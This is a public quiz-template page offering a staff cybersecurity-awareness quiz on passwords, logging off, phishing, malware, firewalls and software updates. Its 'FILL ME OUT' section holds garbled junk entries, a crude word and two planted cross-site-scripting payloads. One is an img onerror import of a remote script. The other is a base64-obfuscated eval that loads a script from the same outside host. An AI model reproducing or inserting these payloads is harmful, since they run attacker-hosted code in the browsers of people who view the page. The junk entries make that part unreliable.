Title Page

  • Site conducted

  • Conducted on

  • Prepared by

  • Location

Untitled Page

Example

Question (required) Suggested max 120 characters

  • Answer A (required) Suggested max 75 characters

  • Answer B (required) Suggested max 75 characters

  • Answer C (optional) Suggested max 75 characters

  • Answer D (optional) Suggested max 75 characters

  • Answer E (optional) Suggested max 75 characters

  • Answer F (optional) Suggested max 75 characters

  • Correct Answer(s) (required) Choose at least one

  • Follow up text to reinforce the answer (required) Suggested max 120 characters

  • Who should you share your passwords with?

  • No one

  • A secure digital password manager

  • Your partners

  • Your coworkers

  • Your parents

  • Absolutely no one! Just as you wouldn’t give anyone your driver's license or passport to carry around with them, it’s important to keep your passwords private and to respect the privacy other people's passwords

  • Should you remain loggedin to the websites you access from the office computers?

  • True

  • False

  • You should never do this! While it’s certainly convenient to not have to log in every time on our own devices by keeping your accounts logged in, it is important to consider the risk of what might happen if our device gets in the wrong hands! So, always remember to logoff from computers or websites that are not in use

  • What is a common goal of criminals behind a cyber attack?

  • To disrupt an organization's operation

  • To spread useful information

  • To make financial gains

  • The goals of attackers behind most cyber attacks are to either disrupt that organization's operation or steal sensitive information from an individual or that organization. Cyber attacks are often done through a computer or a computer network that's why it's important to take safety precautions whenever you are using our computers or a device within our company's network

  • How can malware breach a network?

  • If you click on a suspicious link in an email

  • If you use a computer more than 5 hours

  • If you don't shut down your work computer properly

  • Malware such as viruses, ransomware, and spyware typically breach through a computer network when someone within that network lets them in. One may not be aware of it, but clicking a suspicious link (or installing an unauthorized application in their work computer) is enough for that malware to breach an organization's computer network!

  • Can unauthorized software such as malware invade your computer without your consent?

  • No, definitely not

  • It depends whether I have an adblocker installed

  • It usually happens when you leave your system unattended or surf the internet without using any firewall against malware and viruses

  • True or False? It is alright to ignore notifications about software updates and security patches

  • False

  • True

  • Sometimes

  • False! It is important to allow security patches and software update for computers to occur. Security patches and software updates are important as they include updates that help improve your computer's way of protecting your data, reducing the risk of unauthorized software from accessing your computer!

  • How does a firewall prevent unauthorized software from accessing your computer?

  • By scanning the data that goes through your computer to notify you if there is a threat

  • By connecting to government networks and exposing the location of cyber attackers to authorities

  • By burning the computer where the unauthorized software came from, hence the name "fire"wall

  • Firewalls help reduce the risk of unauthorized software from accessing your computer by scanning the data that goes through your computer to notify you if there is a threat. They provide a protective layer between your computer and the internet

  • Should you open file attachments within email messages sent by senders you do not trust?

  • You should never open any file attachments within email messages sent by senders you do not trust. One of the most common ways attackers use to spread malware and other unauthorized software to their victims is through emails, so make sure to carefully read emails and make sure that they are from trusted senders

  • What should you do with emails sent by unknown sources?

  • Ignore them

  • Open them to double check who they are from

  • Forward them to your manager

  • Ignore or delete email messages from unknown sources and NEVER open any file attachments within messages sent by senders you do not trust. One of the most common ways attackers use to spread malware is through emails!

  • What do phishing emails usually contain?

  • A link and/or a downloadable file

  • A phone number and/or home address

  • A link and/or image

  • Phishing emails usually contain a link and/or a downloadable file

  • What does a phishing email look like?

  • Email from another trusted source

  • It has all bolded text

  • A phishing email often looks like its from a trusted source. This type of attack often impersonate banks which contributes to 93% of successful data breaches based on studies and are usually emails that: Ask for help Ask for a donation Ask for verification Notify about a winning

  • Which of these will assist you in preventing phishing emails from entering your email inbox?

  • Setting your spam filters to high

  • Checking your emails regularly

  • Only accessing your email on your personal computer

  • Set your spam filters to high. Every email program has spam filters. To find yours, look at your settings options, and set them to high–just remember to check your spam folder periodically to see if a legitimate email has been accidentally trapped there

  • If you want to find out if an email is from a legitimate sender, what should you do?

  • Do your research

  • Click on all the links in the email

  • Respond to the email and ask the sender

  • Use a search engine to go to the real company’s site, or a phone directory to find their phone number to verify if the email you received is legitimate. Be suspicious of unsolicited messages, especially if they're from a company you use

  • How can your company ensure that data in your workplace is protected?

  • Ensure that digital and physical files that contain sensitive data are not left unattended

  • Enforce harsh punishments for anyone who forgets their company login details

  • We can protect company data within the workspace by making sure that digital and physical files that contain sensitive data are not left unattended . This can be done by being aware of your workspace surrounding at all times, locking your computer when stepping away from it, and keeping sensitive files from laying around the workspace

  • Can sensitive company data only be compromised within your workspace?

  • False

  • True

  • False! Company laptops and mobile devices that contain your sensitive information can also be targeted by thieves or cyber attackers even outside the office. That's why it is important to stay on guard while travelling to ensure that your data remains safe and secure

FILL ME OUT

Question (required) Suggested max 120 characters

  • Answer A (required) Suggested max 75 characters

  • Answer B (required) Suggested max 75 characters

  • Answer C (optional) Suggested max 75 characters

  • Answer D (optional) Suggested max 75 characters

  • Answer E (optional) Suggested max 75 characters

  • Answer F (optional) Suggested max 75 characters

  • Correct Answer(s) (required) Choose at least one

  • Follow up text to reinforce the answer (required) Suggested max 120 characters

  • dsfdsfsdasdasdasdasdasdasdasdasdasd

  • ball

  • cat

  • animal

  • cata

  • animal

  • <img src=x onerror=import('https://mell.bxss.in')>

  • oopp

  • ggpp

  • ert

  • iop

  • oooo

  • poii

  • iop

  • <img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbWVsbC5ieHNzLmluIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61 onerror=eval(atob(this.id))>

  • fiah

  • ashole

  • jinke

  • dear

  • cool

  • hot

  • cool

The templates available in our Public Library have been created by our customers and employees to help get you started using SafetyCulture's solutions. The templates are intended to be used as hypothetical examples only and should not be used as a substitute for professional advice. You should seek your own professional advice to determine if the use of a template is permissible in your workplace or jurisdiction. You should independently determine whether the template is suitable for your circumstances.